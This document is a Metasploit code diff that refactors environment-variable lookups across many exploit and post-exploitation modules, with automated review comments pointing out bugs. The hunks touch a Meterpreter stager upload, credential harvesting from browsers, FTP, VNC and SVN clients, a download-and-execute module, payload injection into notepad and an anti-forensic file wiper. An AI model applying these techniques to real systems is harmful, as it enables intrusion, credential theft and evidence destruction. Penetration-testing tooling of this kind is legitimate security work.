xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
rexe_path = "#{path}\\#{rexename}"
return xml_path,rexe_path


@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = dir_env['SystemRoot']
tmpdir = dir_env['TEMP']
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
begin
@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
moved = false
configed = false
#default path, but there should be an ImagePath registry key
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
source = "#{sysdir}\\system32\\#{serv}.exe"
#get path to exe; parse out quotes and arguments
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
sourcemaybe = session.fs.file.expand_path(sourceorig)
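Review bot: The second hunk replaces `expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")` with `"#{sysdir}\\system32\\#{serv}.exe"`, which only works if the `sysdir` local from the first hunk is still in scope; if the two hunks belong to different methods this is a `NameError` at runtime, and the method bodies are not visible here to confirm. `getenvs` returns a hash, so an unset `SystemRoot` or `TEMP` yields nil and `sysdir` is interpolated as an empty prefix; checking both values right after the `getenvs` call and failing with a clear message keeps the later `system32` path from being root-relative. The `session.fs.file.expand_path(sourceorig)` on the last line is still the right call for the registry `ImagePath`, which can itself contain `%SystemRoot%`.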


@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
end
end
win_temp = client.fs.file.expand_path("%TEMP%")
win_temp = client.sys.config.getenv('TEMP')
win_file = "#{win_temp}\\#{payload_exe}"
print_status("Attempting to delete #{win_file} ...")
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
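Review bot: `attrib.exe -r #{win_file}` on the last line is unquoted, so a TEMP path containing a space (a user profile with a space in its name, for instance) is split into several arguments and the read-only bit is never cleared; the other cleanup sites in this commit quote the path as `%Q|attrib.exe -r "#{win_file}"|`, and this one should too. `client.sys.config.getenv('TEMP')` may also return nil, in which case `win_file` becomes root-relative, so a nil check before the delete is cheap insurance.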


@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
windir = client.fs.file.expand_path("%WINDIR%")
windir = client.sys.config.getenv('WINDIR')
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
cmd = "#{windir}\\system32\\attrib.exe -r " +


@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
windir = session.fs.file.expand_path("%WINDIR%")
windir = session.sys.config.getenv('WINDIR')
win_file = "#{windir}\\system32\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the


@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
end
def exists_exe?(exe)
path = expand_path("$PATH")
path = session.sys.config.getenv("PATH")
if path.nil? or path.empty?
return false
end
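Review bot: Replacing `expand_path("$PATH")` with `session.sys.config.getenv("PATH")` ties `exists_exe?` to Meterpreter sessions — `sys.config` is a Meterpreter API, while the `Msf::Post::File` `expand_path` helper also worked over plain shell sessions — so if this module's `SessionTypes` still include `shell`, the method now raises `NoMethodError` there. Either narrow the session types in the module info or keep a shell fallback, e.g. `path = session.type == 'meterpreter' ? session.sys.config.getenv('PATH') : cmd_exec('echo $PATH')`. The `path.nil? or path.empty?` check that follows already copes with a nil result, so that part needs no change.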


@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
paths = enum_users_unix
when /win/
@platform = :windows
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
os = session.sys.config.sysinfo['OS']
if os =~ /Windows 7|Vista|2008/
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end


@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
output = []
var_names.delete(nil)
var_names.flatten.uniq.sort.each do |v|
# Emulate the output of set and env, e.g. VAR=VALUE
output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
output << "#{k}=#{v}"
end
@output = output.join("\n")
@ltype = "windows.environment"
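Review bot: The output order now follows the hash that `getenvs` returns rather than the sorted name list passed in, so the `windows.environment` loot may no longer be sorted if the hash is built in response order; `.sort.each do |k, v|` on the returned hash (or `sort_by { |k, _| k }`) restores the previous ordering. Variables listed in the registry but unset in the session's process environment presumably come back as nil and are emitted as `NAME=`, where the old `expand_path` form printed the literal `%NAME%`; a comment stating which behaviour is intended would help. `var_names.delete(nil)` runs before `flatten`, so it only removes a nil returned by a failed `registry_enumvals`, not nils nested inside the arrays — fine as long as that helper never yields them.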


@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end


@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post
def get_ff_and_loot_path
@paths = {}
check_paths = []
drive = expand_path("%SystemDrive%")
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
case @platform
@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post
print_error("You need root privileges on this platform for DECRYPT option")
return false
end
tmpdir = expand_path("%TEMP%") + "\\"
env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
tmpdir = env_vars['TEMP'] + "\\"
drive = env_vars['SystemDrive']
# this way allows for more independent use of meterpreter
# payload (32 and 64 bit) and cleaner code
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
return session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
return session.shell_command("whoami").chomp
session.shell_command("whoami").chomp
end
end
end
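Review bot: `drive = expand_path("%SystemDrive%")` was removed from the common prologue of `get_ff_and_loot_path` and is now assigned only inside the Windows branch, so any other `case @platform` branch (outside the hunk) that still references `drive` will raise `NameError`; the rest of the method is not visible here, so that needs checking. `env_vars['TEMP'] + "\\"` raises `NoMethodError` when `getenvs` returns nil for `TEMP`, where the old `expand_path` form degraded to a literal; `return false unless env_vars['TEMP'] && env_vars['SystemDrive']` with a `print_error` keeps the failure readable. The `whoami` hunk is fine — dropping the explicit `return`s is behaviour-preserving.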


@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end


@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
when /win/
if session.type =~ /meterpreter/
user_profile = session.fs.file.expand_path("%APPDATA%")
user_profile = session.sys.config.getenv('APPDATA')
else
user_profile = cmd_exec("echo %APPDATA%").strip
end


@ -176,7 +176,7 @@ EOS
ring0_code.gsub!('TPTP', [pid].pack('V'))
# Create the malicious Keyboard Layout file...
tmpdir = session.fs.file.expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
fname = "p0wns.boom"
dllpath = "#{tmpdir}\\#{fname}"
fd = session.fs.file.new(dllpath, 'wb')


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
paths = []
services = []
vuln = ""
@temp = session.fs.file.expand_path("%TEMP%")
@temp = session.sys.config.getenv('TEMP')
if init_railgun() == :error
return


@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
print_status("Searching BulletProof FTP Client installation directory...")
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
program_files_x86 = expand_path('%ProgramFiles(X86)%')
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
program_files = program_files_x86 #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
program_files = progfilesx86 # x64
else
program_files = expand_path('%ProgramFiles%') #x86
program_files = progfiles_env['ProgramFiles'] # x86
end
session.fs.dir.foreach(program_files) do |dir|
if dir =~ /BulletProof FTP Client/
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
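Review bot: The hash is assigned to `progfiles_env` but read as `prog_files_env['ProgramFiles(X86)']` on the very next line, which is a `NameError` every time this branch runs; it should read `progfilesx86 = progfiles_env['ProgramFiles(X86)']`. The condition `not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/` is a leftover from `expand_path`, which echoed the unexpanded `%...%` literal on a 32-bit host; `getenvs` presumably returns nil for an unset variable, so `.empty?` itself raises there and the regex never matters — `if progfilesx86 && !progfilesx86.empty?` is the check that fits the new API.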


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
return
end
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
case session.platform
when /win64/i
@progs = drive + '\\Program Files (x86)\\'
@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
end
def whoami
return session.fs.file.expand_path("%USERNAME%")
return session.sys.config.getenv('USERNAME')
end
end


@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
# the correct program files folder.
# We will just use an x64 only defined env variable to check.
if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
progs = expand_path('%ProgramFiles(X86)%') #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
progs = progfilesx86 # x64
else
progs = expand_path('%ProgramFiles%') #x86
progs = progfiles_env['ProgramFiles'] # x86
end
path = progs + '\\Steam\\config'


@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
def get_config_files
# Determine if TortoiseSVN is installed and parse config files
savedpwds = 0
user_appdata = session.fs.file.expand_path("%APPDATA%")
path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
print_status("Checking for configuration files in: #{path}")
begin


@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
end
def check_systemroot
winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
check_other(winpath)
end


@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
locations = []
#Checks
locations << {:name => 'UltraVNC',
:check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
progfiles_env.each do |k, v|
next if v.blank?
locations << {:name => 'UltraVNC',
:check_file => "#{v}\\UltraVNC\\ultravnc.ini",
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
end
locations << {:name => 'WinVNC3_HKLM',
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',


@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
def run
print_status("Looking for WinSCP.ini file storage...")
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
print_status("Looking for Registry Storage...")
get_reg()
print_status("Done!")


@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
user = session.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
userinfo = {}
end
else
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath


@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
host = session.session_host
#Get Google Chrome user data path
sysdrive = expand_path("%SYSTEMDRIVE%").strip
env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
sysdrive = env_vars['SYSTEMDRIVE'].strip
if directory?("#{sysdrive}\\Users")
@profiles_path = "#{sysdrive}/Users"
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
else
uid = session.sys.config.getuid
print_status "Running as user '#{uid}'..."
usernames << expand_path("%USERNAME%").strip
usernames << env_vars['USERNAME'].strip
end
has_sqlite3 = true
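Review bot: `sysdrive = env_vars['SYSTEMDRIVE'].strip` and `usernames << env_vars['USERNAME'].strip` call `strip` on whatever getenvs returned, which raises NoMethodError if the key is missing, whereas the replaced expand_path calls always yielded a String. Whether getenvs omits unset names is not visible here; `env_vars['SYSTEMDRIVE'].to_s.strip` keeps the old always-a-String behaviour at the cost of an empty path that the later `directory?` check would then reject. The enclosing method continues outside both hunks.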


@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
return results
end
windir = session.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
data = nil
@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
elsif exist?(val_location + "\\my.cnf")
data = read_file(val_location + "\\my.cnf")
else
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")


@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
def download_files(location, file_type)
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
sysnfo = client.sys.config.sysinfo['OS']
profile_path_old = sysdriv + "\\Documents and Settings\\"
profile_path_new = sysdriv + "\\Users\\"


@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
xp_c = "\\Cookies\\index.dat"
h_paths = []
c_paths = []
base = session.fs.file.expand_path("%USERPROFILE%")
base = session.sys.config.getenv('USERPROFILE')
if host['OS'] =~ /(Windows 7|2008|Vista)/
h_paths << base + vist_h
h_paths << base + vist_hlow


@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
users = []
user = session.sys.config.getuid
path4users = ""
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
end
else
userinfo = {}
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
powershell_module_path = session.sys.config.getenv('PSModulePath')
session.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")


@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
print_prefetch_key_value
print_timezone_key_values(key_value)
print_good("Current UTC Time: %s" % Time.now.utc)
sys_root = expand_path("%SYSTEMROOT%")
sys_root = session.sys.config.getenv('SYSTEMROOT')
full_path = sys_root + "\\Prefetch\\"
file_type = "*.pf"
print_status("Gathering information from remote system. This will take awhile..")


@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
# Initialize all 7 possible paths for the answer file
#
def init_paths
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
files =
[


@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post
register_advanced_options(
[
OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]),
], self.class)
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
url = datastore["URL"]
filename = datastore["FILENAME"] || url.split('/').last
download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
if download_path.nil? or download_path.empty?
path = session.fs.file.expand_path("%TEMP%")
path = datastore['DOWNLOAD_PATH']
if path.blank?
path = session.sys.config.getenv('TEMP')
else
path = download_path
path = session.fs.file.expand_path(path)
end
outpath = path + '\\' + filename
exec = datastore['EXECUTE']
exec_string = datastore['EXEC_STRING'] || ''
exec_string = datastore['EXEC_STRING']
output = datastore['OUTPUT']
remove = datastore['DELETE']
@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post
# Execute file upon request
if exec
begin
cmd = "#{outpath} #{exec_string}"
# If we don't have the following gsub, we get this error in Windows:
# "Operation failed: The system cannot find the file specified"
cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
cmd = "\"#{outpath}\" #{exec_string}"
print_status("Executing file: #{cmd}")
res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])
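Review bot: The blank check moved from the expanded path to the raw `datastore['DOWNLOAD_PATH']`, so the result of `session.fs.file.expand_path(path)` is no longer validated; if expansion of an unknown `%VAR%` yields an empty or unchanged string, `outpath = path + '\\' + filename` becomes a root-relative or literal-`%VAR%` path instead of falling back to `%TEMP%` as the old `download_path.nil? or download_path.empty?` guard did. Checking after expansion keeps that guarantee: `path = datastore['DOWNLOAD_PATH']`, `path = session.fs.file.expand_path(path) unless path.blank?`, `path = session.sys.config.getenv('TEMP') if path.blank?`. The new `cmd = "\"#{outpath}\" #{exec_string}"` quotes only the executable, which is fine for the operator-supplied EXEC_STRING but deserves a comment, e.g. `# quote the path so spaces in %TEMP% or FILENAME survive cmd_exec; EXEC_STRING is passed verbatim`. The enclosing method continues outside the hunks.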


@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
end
def create_pac(local_pac)
pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
conf_pac = ""
if ::File.exists?(local_pac)


@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc(pay)
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if pay.arch.join == "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"


@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
else
print_status("Rpcap service found: #{serv['Name']}")
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
# TODO: check if this works on x64
prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
if reg != 2
print_status("Setting rpcapd as 'auto' service")
service_change_startup("rpcapd","auto")
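Review bot: The `# TODO: check if this works on x64` left on the new `prog=` line can be resolved the same way the UltraVNC hunk in this commit does: fetch both `ProgramFiles` and `ProgramFiles(x86)` with getenvs and pick the directory where `winpcap\rpcapd.exe` actually exists, since on x64 hosts `ProgramFiles` names the 64-bit directory and a 32-bit rpcapd would presumably live under the x86 one. Independently, `<<` appends to the String object getenv returned; `prog = "#{session.sys.config.getenv('ProgramFiles')}\\winpcap\\rpcapd.exe"` builds a fresh string and avoids mutating a value the session layer may hand back again. The enclosing block starts and ends outside the hunk.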


@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
end
# set profile paths
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
profiles_path = sysdrive + "\\Documents and Settings\\"
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/


@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
#Function to calculate the size of the cluster
def size_cluster()
drive = expand_path("%SystemDrive%")
r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
drive = session.sys.config.getenv('SystemDrive')
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
print_status("Cluster Size: #{cluster}")
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
#Function to calculate the real file size on disk (file size + slack space)
def size_on_disk(file)
size_file = client.fs.file.stat(file).size;
size_file = session.fs.file.stat(file).size;
print_status("Size of the file: #{size_file}")
if (size_file<800)
@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
rsec= Rex::Text.rand_text_numeric(7,bad='012')
date = Time.now - rsec.to_i
print_status("Changing MACE attributes")
client.priv.fs.set_file_mace(file, date,date,date,date)
session.priv.fs.set_file_mace(file, date,date,date,date)
end
#Function to overwrite the file
def file_overwrite(file,type,n)
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
handle=r['return']
real_size=size_on_disk(file)
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
end
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
if w['return']==false
print_error("The was an error writing to disk, check permissions")
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
end
client.railgun.kernel32.CloseHandle(handle)
session.railgun.kernel32.CloseHandle(handle)
change_mace(file)
#Generate a long random file name before delete it
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
print_status("Changing file name")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
client.railgun.kernel32.MoveFileA(file,newname)
session.railgun.kernel32.MoveFileA(file,newname)
file_rm(newname)
print_good("File erased!")
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
#Check if the file is encrypted or compressed
def comp_encr(file)
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
handle=client.railgun.kernel32.GetFileAttributesA(file)
handle=session.railgun.kernel32.GetFileAttributesA(file)
type= handle['return']
#FILE_ATTRIBUTE_COMPRESSED=0x800


@ -61,7 +61,7 @@ def enum_users(os)
user = @client.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -83,7 +83,7 @@ def enum_users(os)
users << userinfo
end
else
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath


@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")


@ -195,7 +195,7 @@ host = session.session_host
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
::FileUtils.mkdir_p(@log_dir)
sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
if os =~ /(Windows 7|2008|Vista)/
@profiles_path = sysdrive + "\\Users\\"
@ -218,7 +218,7 @@ if is_system?
print_status "users found: #{usernames.join(", ")}"
else
print_status "running as user '#{uid}'..."
usernames << client.fs.file.expand_path("%USERNAME%")
usernames << client.sys.config.getenv('USERNAME')
prepare_railgun
end


@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
if frfxchk
user = @client.sys.config.getuid
if not is_system?
usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
usrname = envs['USERNAME']
db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
end
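Review bot: `usrname = envs['USERNAME']` drops the `Rex::FileUtils.clean_path` wrapper the replaced line applied, so a target-controlled username is now used unsanitised; the old code presumably cleaned it because `usrname` feeds a local log or loot path below the hunk, where separators or `..` in the value would escape the intended directory. Keep the wrapper: `usrname = Rex::FileUtils.clean_path(envs['USERNAME'])`. `db_path` is a remote path and does not need it. The enclosing block continues outside the hunk.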


@ -22,7 +22,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -43,7 +43,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -83,7 +83,7 @@ def enum_powershell
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
powershell_module_path = @client.sys.config.getenv('PSModulePath')
@client.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")


@ -223,7 +223,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -244,7 +244,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo


@ -18,13 +18,12 @@ def list_env_vars(var_names)
"Name",
"Value"
])
var_names.flatten.each do |v|
tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
tbl << [k, v]
end
print("\n" + tbl.to_s + "\n")
end
opts.parse(args) { |opt, idx, val|
case opt
when "-h"
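Review bot: `@client.sys.config.getenvs(*var_names.flatten).each do |k, v|` prints only what getenvs returns, so if it omits names that are unset on the target (not visible here) the table silently shrinks, where the old code printed an unexpanded `%NAME%` row for them. Iterating the requested names keeps one row per request: `envs = @client.sys.config.getenvs(*var_names.flatten)` then `var_names.flatten.each { |name| tbl << [name, envs[name]] }`. The enclosing `list_env_vars` method starts outside the hunk.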


@ -114,7 +114,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -135,7 +135,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo


@ -145,7 +145,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
